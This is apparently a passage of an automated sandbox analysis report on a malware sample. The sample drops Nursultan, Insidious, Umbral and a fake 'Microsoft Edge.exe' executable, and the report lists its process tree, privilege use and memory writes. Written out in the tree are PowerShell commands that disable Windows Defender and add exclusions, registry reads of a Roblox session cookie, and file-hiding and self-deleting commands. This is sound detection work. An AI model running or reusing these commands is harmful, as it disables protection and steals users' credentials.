Token: SeDebugPrivilege	5548	Insidious.exe
Token: SeDebugPrivilege	3640	Microsoft Edge.exe
Token: SeDebugPrivilege	5712	powershell.exe
Token: SeDebugPrivilege	6016	powershell.exe
Token: SeDebugPrivilege	2732	Microsoft Edge.exe
Token: SeDebugPrivilege	4856	Insidious.exe
Token: SeDebugPrivilege	4104	Microsoft Edge.exe
Token: SeDebugPrivilege	5640	Insidious.exe
Token: SeDebugPrivilege	5244	Microsoft Edge.exe
Token: SeDebugPrivilege	5152	Insidious.exe
Token: SeDebugPrivilege	2236	Microsoft Edge.exe
Token: SeDebugPrivilege	2220	Insidious.exe
Token: SeDebugPrivilege	5668	Microsoft Edge.exe
Token: SeDebugPrivilege	3028	Insidious.exe
Token: SeDebugPrivilege	916	Microsoft Edge.exe
Token: SeDebugPrivilege	4396	Insidious.exe
Token: SeDebugPrivilege	1732	Microsoft Edge.exe
Token: SeDebugPrivilege	3516	Insidious.exe
Token: SeDebugPrivilege	2612	Microsoft Edge.exe
Token: SeDebugPrivilege	5420	Insidious.exe
Token: SeDebugPrivilege	4240	Microsoft Edge.exe
Token: SeDebugPrivilege	5940	Insidious.exe
Token: SeDebugPrivilege	6060	Microsoft Edge.exe
Token: SeDebugPrivilege	1100	Insidious.exe
Token: SeDebugPrivilege	5960	Microsoft Edge.exe
Token: SeDebugPrivilege	2308	Insidious.exe
Token: SeDebugPrivilege	5420	Microsoft Edge.exe
Token: SeDebugPrivilege	728	Insidious.exe
Token: SeDebugPrivilege	5500	Microsoft Edge.exe
Token: SeDebugPrivilege	220	Insidious.exe
Token: SeDebugPrivilege	4132	Microsoft Edge.exe
Token: SeDebugPrivilege	3364	Insidious.exe
Token: SeDebugPrivilege	5608	Microsoft Edge.exe
Token: SeDebugPrivilege	6012	Insidious.exe
Token: SeDebugPrivilege	5812	Microsoft Edge.exe
Token: SeDebugPrivilege	5472	Insidious.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Microsoft Edge.exe

pid process

2732 Microsoft Edge.exe

pid	process
2732	Microsoft Edge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

366f08500694a72d97a16affa8009f0ff88d859807a7d2cc9533aca6d7c4faf4.exeNursultan.exeNursultan2.exeNursultan.execmd.execmd.exeNursultan2.execmd.exeNursultan.execmd.exeNursultan2.exeNursultan.exe

description	pid	process	target process
PID 1648 wrote to memory of 1296	1648	366f08500694a72d97a16affa8009f0ff88d859807a7d2cc9533aca6d7c4faf4.exe	Nursultan.exe
PID 1648 wrote to memory of 1296	1648	366f08500694a72d97a16affa8009f0ff88d859807a7d2cc9533aca6d7c4faf4.exe	Nursultan.exe
PID 1648 wrote to memory of 2732	1648	366f08500694a72d97a16affa8009f0ff88d859807a7d2cc9533aca6d7c4faf4.exe	Microsoft Edge.exe
PID 1648 wrote to memory of 2732	1648	366f08500694a72d97a16affa8009f0ff88d859807a7d2cc9533aca6d7c4faf4.exe	Microsoft Edge.exe
PID 1296 wrote to memory of 5116	1296	Nursultan.exe	Nursultan2.exe
PID 1296 wrote to memory of 5116	1296	Nursultan.exe	Nursultan2.exe
PID 1296 wrote to memory of 2536	1296	Nursultan.exe	Nursultan.exe
PID 1296 wrote to memory of 2536	1296	Nursultan.exe	Nursultan.exe
PID 5116 wrote to memory of 1724	5116	Nursultan2.exe	cmd.exe
PID 5116 wrote to memory of 1724	5116	Nursultan2.exe	cmd.exe
PID 2536 wrote to memory of 1756	2536	Nursultan.exe	Nursultan2.exe
PID 2536 wrote to memory of 1756	2536	Nursultan.exe	Nursultan2.exe
PID 5116 wrote to memory of 2964	5116	Nursultan2.exe	Insidious.exe
PID 5116 wrote to memory of 2964	5116	Nursultan2.exe	Insidious.exe
PID 2536 wrote to memory of 4788	2536	Nursultan.exe	Nursultan.exe
PID 2536 wrote to memory of 4788	2536	Nursultan.exe	Nursultan.exe
PID 5116 wrote to memory of 4728	5116	Nursultan2.exe	Microsoft Edge.exe
PID 5116 wrote to memory of 4728	5116	Nursultan2.exe	Microsoft Edge.exe
PID 5116 wrote to memory of 1260	5116	Nursultan2.exe	Umbral.exe
PID 5116 wrote to memory of 1260	5116	Nursultan2.exe	Umbral.exe
PID 1724 wrote to memory of 4516	1724	cmd.exe	cmd.exe
PID 1724 wrote to memory of 4516	1724	cmd.exe	cmd.exe
PID 4516 wrote to memory of 4280	4516	cmd.exe	cmd.exe
PID 4516 wrote to memory of 4280	4516	cmd.exe	cmd.exe
PID 4516 wrote to memory of 3044	4516	cmd.exe	cmd.exe
PID 4516 wrote to memory of 3044	4516	cmd.exe	cmd.exe
PID 1724 wrote to memory of 1384	1724	cmd.exe	chcp.com
PID 1724 wrote to memory of 1384	1724	cmd.exe	chcp.com
PID 1724 wrote to memory of 1732	1724	cmd.exe	timeout.exe
PID 1724 wrote to memory of 1732	1724	cmd.exe	timeout.exe
PID 1756 wrote to memory of 1356	1756	Nursultan2.exe	cmd.exe
PID 1756 wrote to memory of 1356	1756	Nursultan2.exe	cmd.exe
PID 1756 wrote to memory of 3988	1756	Nursultan2.exe	Insidious.exe
PID 1756 wrote to memory of 3988	1756	Nursultan2.exe	Insidious.exe
PID 1756 wrote to memory of 4388	1756	Nursultan2.exe	Microsoft Edge.exe
PID 1756 wrote to memory of 4388	1756	Nursultan2.exe	Microsoft Edge.exe
PID 1756 wrote to memory of 4468	1756	Nursultan2.exe	Umbral.exe
PID 1756 wrote to memory of 4468	1756	Nursultan2.exe	Umbral.exe
PID 1356 wrote to memory of 2560	1356	cmd.exe	cmd.exe
PID 1356 wrote to memory of 2560	1356	cmd.exe	cmd.exe
PID 4788 wrote to memory of 3436	4788	Nursultan.exe	Nursultan2.exe
PID 4788 wrote to memory of 3436	4788	Nursultan.exe	Nursultan2.exe
PID 2560 wrote to memory of 4336	2560	cmd.exe	cmd.exe
PID 2560 wrote to memory of 4336	2560	cmd.exe	cmd.exe
PID 2560 wrote to memory of 4784	2560	cmd.exe	cmd.exe
PID 2560 wrote to memory of 4784	2560	cmd.exe	cmd.exe
PID 4788 wrote to memory of 2140	4788	Nursultan.exe	Nursultan.exe
PID 4788 wrote to memory of 2140	4788	Nursultan.exe	Nursultan.exe
PID 1356 wrote to memory of 2900	1356	cmd.exe	chcp.com
PID 1356 wrote to memory of 2900	1356	cmd.exe	chcp.com
PID 1356 wrote to memory of 4392	1356	cmd.exe	timeout.exe
PID 1356 wrote to memory of 4392	1356	cmd.exe	timeout.exe
PID 1724 wrote to memory of 1300	1724	cmd.exe	mode.com
PID 1724 wrote to memory of 1300	1724	cmd.exe	mode.com
PID 3436 wrote to memory of 1940	3436	Nursultan2.exe	cmd.exe
PID 3436 wrote to memory of 1940	3436	Nursultan2.exe	cmd.exe
PID 2140 wrote to memory of 4440	2140	Nursultan.exe	Nursultan2.exe
PID 2140 wrote to memory of 4440	2140	Nursultan.exe	Nursultan2.exe
PID 3436 wrote to memory of 3052	3436	Nursultan2.exe	Insidious.exe
PID 3436 wrote to memory of 3052	3436	Nursultan2.exe	Insidious.exe
PID 2140 wrote to memory of 3696	2140	Nursultan.exe	Nursultan.exe
PID 2140 wrote to memory of 3696	2140	Nursultan.exe	Nursultan.exe
PID 3436 wrote to memory of 1072	3436	Nursultan2.exe	Microsoft Edge.exe
PID 3436 wrote to memory of 1072	3436	Nursultan2.exe	Microsoft Edge.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Views/modifies file attributes 1 TTPs 4 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exe

pid process

2580 attrib.exe
2296 attrib.exe
6372 attrib.exe
4808 attrib.exe

pid	process
2580	attrib.exe
2296	attrib.exe
6372	attrib.exe
4808	attrib.exe

C:\Users\Admin\AppData\Local\Temp\366f08500694a72d97a16affa8009f0ff88d859807a7d2cc9533aca6d7c4faf4.exe
"C:\Users\Admin\AppData\Local\Temp\366f08500694a72d97a16affa8009f0ff88d859807a7d2cc9533aca6d7c4faf4.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1648

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1296

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:1724

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
5⤵
- Suspicious use of WriteProcessMemory
PID:4516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
6⤵
PID:4280

C:\Windows\system32\cmd.exe
cmd
6⤵
PID:3044

C:\Windows\system32\chcp.com
chcp 65001
5⤵
PID:1384

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
5⤵
- Delays execution with timeout.exe
PID:1732

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
5⤵
PID:1300

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
4⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2964

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4728

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1260

C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
5⤵
PID:5348

C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
5⤵
- Views/modifies file attributes
PID:2580

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
5⤵
- Command and Scripting Interpreter: PowerShell
PID:676

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
5⤵
- Command and Scripting Interpreter: PowerShell
PID:5672

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
5⤵
- Command and Scripting Interpreter: PowerShell
PID:2312

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
5⤵
PID:5448

C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
5⤵
PID:1620

C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
5⤵
PID:5936

C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
5⤵
PID:4140

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
5⤵
- Command and Scripting Interpreter: PowerShell
PID:4344

C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
5⤵
- Detects videocard installed
PID:4288

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4652

C:\Windows\system32\PING.EXE
ping localhost
6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:620

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2536

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:1356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
6⤵
- Suspicious use of WriteProcessMemory
PID:2560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
7⤵
PID:4336

C:\Windows\system32\cmd.exe
cmd
7⤵
PID:4784

C:\Windows\system32\chcp.com
chcp 65001
6⤵
PID:2900

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
6⤵
- Delays execution with timeout.exe
PID:4392

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
6⤵
PID:3056

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3988

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4388

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
5⤵
- Executes dropped EXE
PID:4468

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4788

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3436

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
6⤵
PID:1940

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
7⤵
PID:4536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
8⤵
PID:3708

C:\Windows\system32\cmd.exe
cmd
8⤵
PID:4244

C:\Windows\system32\chcp.com
chcp 65001
7⤵
PID:4400

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
7⤵
- Delays execution with timeout.exe
PID:1100

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
7⤵
PID:4628

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3052

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1072

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
6⤵
- Executes dropped EXE
PID:3492

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2140

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
6⤵
- Executes dropped EXE
PID:4440

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
7⤵
PID:1060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
8⤵
PID:1088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
9⤵
PID:3604

C:\Windows\system32\cmd.exe
cmd
9⤵
PID:2544

C:\Windows\system32\chcp.com
chcp 65001
8⤵
PID:4632

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
8⤵
- Delays execution with timeout.exe
PID:676

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
8⤵
PID:3796

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3064

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5004

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
7⤵
- Executes dropped EXE
PID:364

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
6⤵
- Executes dropped EXE
PID:3696

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
7⤵
- Checks computer location settings
- Executes dropped EXE
PID:3444

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
8⤵
PID:1304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
9⤵
PID:2932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
10⤵
PID:1788

C:\Windows\system32\cmd.exe
cmd
10⤵
PID:964

C:\Windows\system32\chcp.com
chcp 65001
9⤵
PID:1648

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
9⤵
- Delays execution with timeout.exe
PID:4620

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
9⤵
PID:4160

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3364

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:464

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
8⤵
- Executes dropped EXE
PID:2864

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
7⤵
- Executes dropped EXE
PID:4504

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
8⤵
- Executes dropped EXE
PID:1236

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
9⤵
PID:4068

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
10⤵
PID:2820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
11⤵
PID:364

C:\Windows\system32\cmd.exe
cmd
11⤵
PID:4368

C:\Windows\system32\chcp.com
chcp 65001
10⤵
PID:1200

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
10⤵
- Delays execution with timeout.exe
PID:1088

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
10⤵
PID:4472

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
9⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3220

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
9⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3872

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
9⤵
- Executes dropped EXE
PID:3144

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
8⤵
- Executes dropped EXE
PID:1732

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
9⤵
- Checks computer location settings
- Executes dropped EXE
PID:1668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
10⤵
PID:3144

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
11⤵
PID:1492

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
12⤵
PID:2308

C:\Windows\system32\cmd.exe
cmd
12⤵
PID:3632

C:\Windows\system32\chcp.com
chcp 65001
11⤵
PID:2984

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
11⤵
- Delays execution with timeout.exe
PID:3704

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
11⤵
PID:1068

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
10⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4368

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
10⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:740

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
10⤵
- Executes dropped EXE
PID:3448

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
9⤵
- Executes dropped EXE
PID:1600

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
10⤵
- Checks computer location settings
- Executes dropped EXE
PID:2396

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
11⤵
PID:2368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
12⤵
PID:464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
13⤵
PID:3668

C:\Windows\system32\cmd.exe
cmd
13⤵
PID:3136

C:\Windows\system32\chcp.com
chcp 65001
12⤵
PID:3496

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
12⤵
- Delays execution with timeout.exe
PID:3540

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
12⤵
PID:5292

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
11⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1648

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
11⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4856

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
11⤵
- Executes dropped EXE
PID:4072

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
10⤵
- Checks computer location settings
- Executes dropped EXE
PID:1900

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
11⤵
- Checks computer location settings
- Executes dropped EXE
PID:3952

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
12⤵
PID:1552

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
13⤵
PID:5180

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
14⤵
PID:5196

C:\Windows\system32\cmd.exe
cmd
14⤵
PID:5204

C:\Windows\system32\chcp.com
chcp 65001
13⤵
PID:5228

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
13⤵
- Delays execution with timeout.exe
PID:5244

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
13⤵
PID:5888

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
12⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3988

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
12⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:676

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
12⤵
- Executes dropped EXE
PID:3020

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
11⤵
- Checks computer location settings
- Executes dropped EXE
PID:620

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
12⤵
- Checks computer location settings
- Executes dropped EXE
PID:4536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
13⤵
PID:5372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
14⤵
PID:5776

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
15⤵
PID:5792

C:\Windows\system32\cmd.exe
cmd
15⤵
PID:5800

C:\Windows\system32\chcp.com
chcp 65001
14⤵
PID:5824

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
14⤵
- Delays execution with timeout.exe
PID:5840

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
14⤵
PID:3952

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
13⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5456

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
13⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5584

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
13⤵
- Executes dropped EXE
PID:5620

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
12⤵
- Checks computer location settings
- Executes dropped EXE
PID:3892

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
13⤵
- Executes dropped EXE
PID:5404

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
14⤵
PID:5952

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
15⤵
PID:6140

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
16⤵
PID:880

C:\Windows\system32\cmd.exe
cmd
16⤵
PID:4392

C:\Windows\system32\chcp.com
chcp 65001
15⤵
PID:3076

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
15⤵
- Delays execution with timeout.exe
PID:1792

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
15⤵
PID:432

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
14⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5992

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
14⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6024

